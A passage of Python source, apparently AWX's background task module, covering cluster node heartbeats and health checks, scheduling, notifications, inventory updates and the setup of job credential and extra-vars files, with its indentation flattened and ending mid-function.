from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on loggins settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.mark_offline(update_last_seen=True, errors=_('Instance received normal shutdown signal'))
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
exclude_type = 'execution' if g.obj.name == settings.DEFAULT_CONTROL_PLANE_QUEUE_NAME else 'control'
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.node_type == exclude_type:
continue # never place execution instances in controlplane group or control instances in other groups
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
exclude_type = 'execution' if g.obj.name == settings.DEFAULT_CONTROL_PLANE_QUEUE_NAME else 'control'
candidate_pool_ct = len([i for i in actual_instances if i.obj.node_type != exclude_type])
if not candidate_pool_ct:
continue
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.node_type == exclude_type:
continue
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / candidate_pool_ct >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
def _cleanup_images_and_files(**kwargs):
if settings.IS_K8S:
return
this_inst = Instance.objects.me()
runner_cleanup_kwargs = this_inst.get_cleanup_task_kwargs(**kwargs)
stdout = ''
with StringIO() as buffer:
with redirect_stdout(buffer):
ansible_runner.cleanup.run_cleanup(runner_cleanup_kwargs)
stdout = buffer.getvalue()
if '(changed: True)' in stdout:
logger.info(f'Performed local cleanup with kwargs {kwargs}, output:\n{stdout}')
# if we are the first instance alphabetically, then run cleanup on execution nodes
checker_instance = Instance.objects.filter(node_type__in=['hybrid', 'control'], enabled=True, capacity__gt=0).order_by('-hostname').first()
if checker_instance and this_inst.hostname == checker_instance.hostname:
logger.info(f'Running execution node cleanup with kwargs {kwargs}')
for inst in Instance.objects.filter(node_type='execution', enabled=True, capacity__gt=0):
runner_cleanup_kwargs = inst.get_cleanup_task_kwargs(**kwargs)
try:
stdout = worker_cleanup(inst.hostname, runner_cleanup_kwargs)
if '(changed: True)' in stdout:
logger.info(f'Performed cleanup on execution node {inst.hostname} with output:\n{stdout}')
except RuntimeError:
logger.exception(f'Error running cleanup on execution node {inst.hostname}')
@task(queue='tower_broadcast_all')
def handle_removed_image(remove_images=None):
"""Special broadcast invocation of this method to handle case of deleted EE"""
_cleanup_images_and_files(remove_images=remove_images, file_pattern='')
@task(queue=get_local_queuename)
def cleanup_images_and_files():
_cleanup_images_and_files()
@task(queue=get_local_queuename)
def cluster_node_health_check(node):
'''
Used for the health check endpoint, refreshes the status of the instance, but must be ran on target node
'''
if node == '':
logger.warn('Local health check incorrectly called with blank string')
return
elif node != settings.CLUSTER_HOST_ID:
logger.warn(f'Local health check for {node} incorrectly sent to {settings.CLUSTER_HOST_ID}')
return
try:
this_inst = Instance.objects.me()
except Instance.DoesNotExist:
logger.warn(f'Instance record for {node} missing, could not check capacity.')
return
this_inst.local_health_check()
@task(queue=get_local_queuename)
def execution_node_health_check(node):
if node == '':
logger.warn('Remote health check incorrectly called with blank string')
return
try:
instance = Instance.objects.get(hostname=node)
except Instance.DoesNotExist:
logger.warn(f'Instance record for {node} missing, could not check capacity.')
return
if instance.node_type != 'execution':
raise RuntimeError(f'Execution node health check ran against {instance.node_type} node {instance.hostname}')
data = worker_info(node)
prior_capacity = instance.capacity
instance.save_health_data(
version='ansible-runner-' + data.get('runner_version', '???'),
cpu=data.get('cpu_count', 0),
memory=data.get('mem_in_bytes', 0),
uuid=data.get('uuid'),
errors='\n'.join(data.get('errors', [])),
)
if data['errors']:
formatted_error = "\n".join(data["errors"])
if prior_capacity:
logger.warn(f'Health check marking execution node {node} as lost, errors:\n{formatted_error}')
else:
logger.info(f'Failed to find capacity of new or lost execution node {node}, errors:\n{formatted_error}')
else:
logger.info('Set capacity of execution node {} to {}, worker info data:\n{}'.format(node, instance.capacity, json.dumps(data, indent=2)))
return data
def inspect_execution_nodes(instance_list):
with advisory_lock('inspect_execution_nodes_lock', wait=False):
node_lookup = {}
for inst in instance_list:
if inst.node_type == 'execution':
node_lookup[inst.hostname] = inst
ctl = get_receptor_ctl()
connections = ctl.simple_command('status')['Advertisements']
nowtime = now()
for ad in connections:
hostname = ad['NodeID']
commands = ad.get('WorkCommands') or []
worktypes = []
for c in commands:
worktypes.append(c["WorkType"])
if 'ansible-runner' not in worktypes:
continue
changed = False
if hostname in node_lookup:
instance = node_lookup[hostname]
elif settings.MESH_AUTODISCOVERY_ENABLED:
defaults = dict(enabled=False)
(changed, instance) = Instance.objects.register(hostname=hostname, node_type='execution', defaults=defaults)
logger.warn(f"Registered execution node '{hostname}' (marked disabled by default)")
else:
logger.warn(f"Unrecognized node on mesh advertising ansible-runner work type: {hostname}")
was_lost = instance.is_lost(ref_time=nowtime)
last_seen = parse_date(ad['Time'])
if instance.last_seen and instance.last_seen >= last_seen:
continue
instance.last_seen = last_seen
instance.save(update_fields=['last_seen'])
if changed:
execution_node_health_check.apply_async([hostname])
elif was_lost:
# if the instance *was* lost, but has appeared again,
# attempt to re-establish the initial capacity and version
# check
logger.warn(f'Execution node attempting to rejoin as instance {hostname}.')
execution_node_health_check.apply_async([hostname])
elif instance.capacity == 0:
# nodes with proven connection but need remediation run health checks are reduced frequency
if not instance.last_health_check or (nowtime - instance.last_health_check).total_seconds() >= settings.EXECUTION_NODE_REMEDIATION_CHECKS:
# Periodically re-run the health check of errored nodes, in case someone fixed it
# TODO: perhaps decrease the frequency of these checks
logger.debug(f'Restarting health check for execution node {hostname} with known errors.')
execution_node_health_check.apply_async([hostname])
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
for inst in instance_list:
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
break
else:
(changed, this_inst) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower control node '{}'".format(this_inst.hostname))
inspect_execution_nodes(instance_list)
for inst in list(instance_list):
if inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.local_health_check()
if startup_event and this_inst.capacity != 0:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "" or other_inst.version.startswith('ansible-runner') or other_inst.node_type == 'execution':
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisining is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.mark_offline(errors=_('Another cluster node has determined this instance to be unresponsive'))
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.last_seen))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_receptor_workunit_reaper():
"""
When an AWX job is launched via receptor, files such as status, stdin, and stdout are created
in a specific receptor directory. This directory on disk is a random 8 character string, e.g. qLL2JFNT
This is also called the work Unit ID in receptor, and is used in various receptor commands,
e.g. "work results qLL2JFNT"
After an AWX job executes, the receptor work unit directory is cleaned up by
issuing the work release command. In some cases the release process might fail, or
if AWX crashes during a job's execution, the work release command is never issued to begin with.
As such, this periodic task will obtain a list of all receptor work units, and find which ones
belong to AWX jobs that are in a completed state (status is canceled, error, or succeeded).
This task will call "work release" on each of these work units to clean up the files on disk.
Note that when we call "work release" on a work unit that actually represents remote work
both the local and remote work units are cleaned up.
Since we are cleaning up jobs that controller considers to be inactive, we take the added
precaution of calling "work cancel" in case the work unit is still active.
"""
if not settings.RECEPTOR_RELEASE_WORK:
return
logger.debug("Checking for unreleased receptor work units")
receptor_ctl = get_receptor_ctl()
receptor_work_list = receptor_ctl.simple_command("work list")
unit_ids = [id for id in receptor_work_list]
jobs_with_unreleased_receptor_units = UnifiedJob.objects.filter(work_unit_id__in=unit_ids).exclude(status__in=ACTIVE_STATES)
for job in jobs_with_unreleased_receptor_units:
logger.debug(f"{job.log_format} is not active, reaping receptor work unit {job.work_unit_id}")
receptor_ctl.simple_command(f"work cancel {job.work_unit_id}")
receptor_ctl.simple_command(f"work release {job.work_unit_id}")
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
self.job_created = None
self.recent_event_timings = deque(maxlen=settings.MAX_WEBSOCKET_EVENT_RATE)
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"process_isolation_executable": "podman", # need to provide, runner enforces default via argparse
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
verify_ssl = cred.get_input('verify_ssl')
params['container_auth_data'] = {'host': host, 'username': username, 'password': password, 'verify_ssl': verify_ssl}
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Using z allows the dir to mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
path = tempfile.mkdtemp(prefix=JOB_FOLDER_PREFIX % instance.pk, dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(path)
# Ansible runner requires that project exists,
# and we will write files in the other folders without pre-creating the folder
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
